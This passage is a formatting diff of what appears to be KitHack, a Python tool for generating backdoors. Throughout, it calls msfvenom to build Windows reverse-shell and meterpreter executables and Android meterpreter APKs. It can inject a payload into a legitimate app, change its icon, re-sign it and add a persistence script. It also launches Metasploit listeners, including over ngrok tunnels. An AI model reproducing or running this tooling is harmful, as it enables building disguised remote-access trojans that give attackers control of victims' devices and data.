&& msfvenom -p windows/meterpreter/reverse_tcp_dns LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + if os.stat("output/{}.exe".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter/reverse_tcp_dns; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter/reverse_tcp_dns; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter/reverse_tcp_dns; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter/reverse_tcp_dns; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '12': + elif pay == "12": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p windows/metsvc_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p windows/metsvc_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + if os.stat("output/{}.exe".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/metsvc_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/metsvc_reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/metsvc_reverse_tcp; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/metsvc_reverse_tcp; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '13': + elif pay == "13": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p windows/powershell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p windows/powershell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + if os.stat("output/{}.exe".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/powershell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/powershell_reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/powershell_reverse_tcp; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/powershell_reverse_tcp; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '14': + elif pay == "14": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p windows/shell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p windows/shell_reverse_tcp LHOST={0} LPORT={1} -f exe > output/{2}.exe".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.exe'.format(mainout)).st_size != 0: + if os.stat("output/{}.exe".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/shell_reverse_tcp; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/shell_reverse_tcp; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/shell_reverse_tcp; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') + os.system("clear") main() - elif sys == '03': - print('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) - print( - '{0}[01]{1} android/meterpreter_reverse_http'.format(WHITE, YELLOW)) - print( - '{0}[02]{1} android/meterpreter_reverse_https'.format(WHITE, YELLOW)) - print( - '{0}[03]{1} android/meterpreter_reverse_tcp'.format(WHITE, YELLOW)) - print( - '{0}[04]{1} android/meterpreter/reverse_tcp'.format(WHITE, YELLOW)) - print('{0}[05]{1} android/shell/reverse_http'.format(WHITE, YELLOW)) - print('{0}[06]{1} android/shell/reverse_https'.format(WHITE, YELLOW)) - print('{0}[07]{1} android/shell/reverse_tcp'.format(WHITE, YELLOW)) + elif sys == "03": + print("{0}\n [*] {1}Select Payload:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} android/meterpreter_reverse_http".format(WHITE, YELLOW)) + print("{0}[02]{1} android/meterpreter_reverse_https".format(WHITE, YELLOW)) + print("{0}[03]{1} android/meterpreter_reverse_tcp".format(WHITE, YELLOW)) + print("{0}[04]{1} android/meterpreter/reverse_tcp".format(WHITE, YELLOW)) + print("{0}[05]{1} android/shell/reverse_http".format(WHITE, YELLOW)) + print("{0}[06]{1} android/shell/reverse_https".format(WHITE, YELLOW)) + print("{0}[07]{1} android/shell/reverse_tcp".format(WHITE, YELLOW)) pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) pay = pay.zfill(2) - if pay == '01': - print('{0}\n [*] {1}Select APK Type:\n'.format(DEFAULT, GREEN)) - print('{0}[01]{1} APK MSF'.format(WHITE, YELLOW)) - print('{0}[02]{1} APK ORIGINAL'.format(WHITE, YELLOW)) + if pay == "01": + print("{0}\n [*] {1}Select APK Type:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} APK MSF".format(WHITE, YELLOW)) + print("{0}[02]{1} APK ORIGINAL".format(WHITE, YELLOW)) a = input("{0}KitHack >> {1}".format(RED, DEFAULT)) a = a.zfill(2) - if a == '01': + if a == "01": run_network() - LHOST = input( - "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input( - "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - while input("\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + while ( + input( + "\n{0}[!] ¿Desea modificar el nombre/icono predeterminados? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): break else: Tk().withdraw() icon = filedialog.askopenfilename( - title="KITHACK - SELECT ICON PNG", filetypes=(("png files", "*.png"), ("all files", "*.*"))) + title="KITHACK - SELECT ICON PNG", + filetypes=(("png files", "*.png"), ("all files", "*.*")), + ) print("\n{0}ICON: {1}".format(YELLOW, icon)) OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) + ) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) file = open("/tmp/data.txt", "w") - file.write(icon + '\n') + file.write(icon + "\n") file.write(mainout) file.close() print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) + ) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p android/meterpreter_reverse_http LHOST={0} LPORT={1} R > output/payload.apk'.format(LHOST, LPORT)) - print( - "{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) + "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_http LHOST={0} LPORT={1} R > output/payload.apk".format( + LHOST, LPORT + ) + ) + print("{0}[*] Decompiling APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) - os.system( - 'apktool d -f -o output/payload output/payload.apk') + os.system("apktool d -f -o output/payload output/payload.apk") print( - "\n{0}[*] Configuring icon change...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Configuring icon change...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - subprocess.Popen(['bash', '-c', '. lib/apkf.sh; icon']) - print( - "\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) + subprocess.Popen(["bash", "-c", ". lib/apkf.sh; icon"]) + print("\n{0}[*] Compiling RAT APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) - os.system( - 'apktool b output/payload -o output/kithack.apk') + os.system("apktool b output/payload -o output/kithack.apk") location = os.getcwd() - if os.path.isfile('output/kithack.apk'): - print( - "\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) + if os.path.isfile("output/kithack.apk"): + print("\n{0}[*] Signing APK...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android') + "jarsigner -keystore certificate.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA output/kithack.apk android" + ) time.sleep(4) os.system( - 'zipalign 4 output/kithack.apk output/{0}.apk'.format(mainout)) + "zipalign 4 output/kithack.apk output/{0}.apk".format( + mainout + ) + ) while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[*] Deleting temporary files...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Deleting temporary files...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) os.system( - 'rm -rf output/payload output/payload.apk output/kithack.apk') + "rm -rf output/payload output/payload.apk output/kithack.apk" + ) print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format( + LHOST, LPORT + ) + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"' + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) os.system( - 'rm -rf output/payload output/payload.apk output/kithack.apk') + "rm -rf output/payload output/payload.apk output/kithack.apk" + ) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() # Salida de bucle - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p android/meterpreter_reverse_http LHOST={0} LPORT={1} R > output/{2}.apk'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p android/meterpreter_reverse_http LHOST={0} LPORT={1} R > output/{2}.apk".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + if os.stat("output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format( + LHOST, LPORT + ) + ) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"') - pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"' + ) + pause("\n{}Press any key to continue...".format(GREEN)) + os.system("systemctl stop postgresql && clear") main() else: print( - "\n{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "\n{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif a == '02': + elif a == "02": + print("{0}\n [*] {1}Select Method:\n".format(DEFAULT, GREEN)) print( - '{0}\n [*] {1}Select Method:\n'.format(DEFAULT, GREEN)) - print('{0}[01]{1} Use the old Metasploit method'.format( - WHITE, YELLOW)) - print('{0}[02]{1} Use the new KitHack method'.format( - WHITE, YELLOW)) + "{0}[01]{1} Use the old Metasploit method".format(WHITE, YELLOW) + ) + print("{0}[02]{1} Use the new KitHack method".format(WHITE, YELLOW)) m = input("{0}KitHack >> {1}".format(RED, DEFAULT)) m = m.zfill(2) - if m == '01': + if m == "01": run_network() - LHOST = input( - "\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) - LPORT = input( - "\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) + LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) + LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) Tk().withdraw() APK = filedialog.askopenfilename( - title="KITHACK - SELECT APK ORIGINAL", filetypes=(("apk files", "*.apk"), ("all files", "*.*"))) + title="KITHACK - SELECT APK ORIGINAL", + filetypes=(("apk files", "*.apk"), ("all files", "*.*")), + ) print("\n{0}APK ORIGINAL: {1}".format(YELLOW, APK)) OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT) + ) mainout = os.path.splitext(OUT)[0] var = input( - "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)) + "\n{0}[!] ¿Desea crear persistencia a su APK? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ) print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT) + ) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -x {0} -p android/meterpreter_reverse_https LHOST={1} LPORT={2} > output/{3}.apk'.format(APK, LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -x {0} -p android/meterpreter_reverse_https LHOST={1} LPORT={2} > output/{3}.apk".format( + APK, LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.apk'.format(mainout)).st_size != 0: + if os.stat("output/{}.apk".format(mainout)).st_size != 0: while var.upper() != "N": print( - "\n{0}[*] Generating persistence file...{1}".format(GREEN, DEFAULT)) + "\n{0}[*] Generating persistence file...{1}".format( + GREEN, DEFAULT + ) + ) time.sleep(4) - ext = mainout + '.apk' + ext = mainout + ".apk" subprocess.Popen( - ['bash', '-c', '. lib/apkf.sh; pers output/' + ext]) + ["bash", "-c", ". lib/apkf.sh; pers output/" + ext] + ) print( - "{0}File: {1}/output/{2}.sh".format(DEFAULT, location, mainout)) + "{0}File: {1}/output/{2}.sh".format( + DEFAULT, location, mainout + ) + ) break print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.apk".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD android/meterpreter_reverse_http; exploit\'"'.format( + LHOST, LPORT + ) + ) pause( - "\n{}Press any key to continue...".format(GREEN)) - os.system( - 'systemctl stop postgresql && clear') + "\n{}Press any key to continue...".format(GREEN) + ) + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD android/meterpreter_reverse_http; exploit\'"') + 'xterm 